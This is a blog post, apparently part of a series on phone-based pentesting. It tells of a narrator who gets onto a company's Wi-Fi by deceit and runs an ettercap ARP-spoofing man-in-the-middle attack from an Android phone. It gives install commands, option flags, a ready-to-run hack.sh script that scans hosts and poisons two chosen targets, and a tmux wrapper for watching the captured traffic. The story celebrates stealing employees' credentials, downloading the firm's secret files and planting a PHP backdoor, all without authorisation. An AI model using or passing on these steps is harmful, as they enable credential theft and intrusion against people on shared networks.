Pentesting on the Fly : Android Phone - Part 2) My Phone Is a Network Data Stealer


Pentesting on the Fly : Android Phone - Part 2) My Phone Is a Network Data Stealer

Here we are again, part 2 !
If you followed my previous post, you know that our hero, John, traveled to NYC and sucessfully compromised his hotel's system. Now, we are the day after.
--Keep in Mind that at each chapter you'll need to launch Linux Deploy, tap "Start", and then SSH android@localhost and type in changeme --

0) SCENARIO
Day I ) Hotel's system compromised : two pc backdoored and data stolen. Phone backdoored, and will be used ass pivot
Day II:
Today I woke up early, I just have to set up my things and read again my speech for todays meeting at 8:30 am.
It's 7. I'm on my way to a cosy coffee shop with an Internet connection I located yesterday.






I take a little moment to breathe and profit :) But here's someone comming. A 30 yo man, looking joyful and nice holding is coffee ask me the time. I politely respond 7:30 am, and we start getting acquainted. After some time joking, I learn he works in a big enterprise (something about enterprise management), and he kindly propose me to meet him after his work.I'm interested... I propose him to meet at in his enterprise's entry hall.
After a long day of work and fierce negociation with my co-workers, it's now time to meet my new friend.
I take the metro to the nearest station and I wait him in the courtyard.






I see him at the Window of the third floor, he shakes his hand telling me to come there. I climb the stairs et ask for his office, and I meet him in at his desk."- Sorry he says, my meeting gets long and our investors aren't decided yet. Would you mind waiting half an hour there ?""Of course I say, but I asked him if can get an internet connection in order to check my mails and work a little bit". He shows me a MacBook i could use and went back to his meetingI sit in front of the computer and I get the Wifi WPA2 code (using mac's Keychain, and the password that the dumb proprietary left on a post it).I look around and see some people working. Well... What if I use my connection to steal datas .... ?
Fire ! I GRAB MY PHONE!


I) MAIN IDEA
Here we'll do a simple and quick MITM attack using ettercap.

Don't forget two things :
  • 1) This series is built on the following idea : "Quick and thunder attacks"
  • 2) We use an ssh sessions, so we don't havy GUI, but only command line



II) REQUIREMENTS

  • Have succesfully set up the environment (if not, click here)
  • Ettercap installed
III)INSTALL WHAT'S REQUIRED !
Ettercap //TEXT ONLY \\!!!:
apt-get install ettercap-text-only 1:0.8.0-0kali1






IV) COMMANDS TO BE USED AND SCRIPT TO AUTOMATEImporatant : We're working only in command line so this will be a little different frow what you know if you worked with ettercap before.
Some basic options we'll use :
-T -> Text mode only
-q -> quiet mode
-k -> to write scan's output to file
-M -> Option forr Mitm attack
-s -> to send commands to ettercap once the script is sent (ex : 'q' is for quit)
Part 1 : Scanning the network for hosts and exit
ettercap -T -q -M arp:remote // -s 'q'
Part 2 : Mitm them and sniff out ! (save to LOG)
ettercap -T -q -w LOG -M ARP /target1_IP/ /target2_IP/
Once thèses commands are launched, ettercap will place you in Mitm beetween your targets.
BUT REMEMBER OUR CREED : Hit fast and hard






That's why you have to be always ready. Here's a script to automate that in few seconds :1) Scan
2) Display host list IP
3) Input target 1 & 2
4) Launch the attack !
hack.sh :
CODE :
ettercap -T -q -k /tmp/hosts -M arp:remote // -s 'q'
cut -d ' ' -f 1 /tmp/hosts # reads host list and extract IP adresses
read -p "Target 1 : " t1 #reads user input
read -p "Target 2 : " t2
ettecap -T -w LOG -M ARP /$t1/ /$t2/
Have fun !
Press [CTRL+C] to stop the attack.
Proof ?
1) Launching the script and scanning for hosts





 2) Entering targets & attacking





(you should see headers streaming)3) GET CREDENTIALS FROM LOG FILE !!






Awesome !! I justs stole their credentials, just by sitting in my romm, launching my script and letting my phone is my Pocket.Few minutes later, my new friends comes out, and we'll take a lunch somewhere.
The day after, I woke up and, once again, i go back to my favourite coffee shop ;).
I now use their wifi connection to download all secrets files from their server's databases, I upload a php backdoor and I leave, just in time for catching my plane and go back home...






Oh and by the way... I wanted to use setoolkit on my phone to steal some credentials too but... Maybe another time ?[EDIT]
Here's an updated script for a better hack : Mitm & view the traffic :
tmux -2 new-session -d -s $SESSION
tmux split-window
tmux select-pane -t 0
tmux send-keys "sh ./hack.sh" C-m
tmux select-pane -t 1
tmux send-keys "watch -n 1 'tail /home/android.LOG | hexdump _C' " C-m
tmux select-pane -t 0
tmux select-window -t $SESSION:1
tmux -2 attach-session -t $SESSION
Which gives :






V) NOTESa) this script will scan for host at a T time. This means that not all hosts will be discovered that's why I suggest repeating it (scan) multiple times
b) The screenshots were took in real life against a Captive portal. This shows you that there's no limit. You can use this hack in a situation like my scenario, or either angainst a captive portal, or by extension to anything you're connected to
c) Strike fast, hard and leave it in your Pocket. Smile and wait ;)
d) Any suggestions ?
e) Thanks to :
  • Ciuffys for showing me the "side-note" concept and his cool blog : http://ciuffysblog.blogspot.fr/
  • Cameron Glass for his social engineering posts :) , it inspired me the whole scenario ! (particularly in the first post) ( Cameron : I think you'll never complain again about a Mitm Problem :p )
  • All of my so cool friends : Cracker Hacker (I promised a coffee shop ! :D thanks for your Mitm work ), CyberHitchHiker for what you did for me



Aucun commentaire:

Enregistrer un commentaire

Inscription à : Articles (Atom)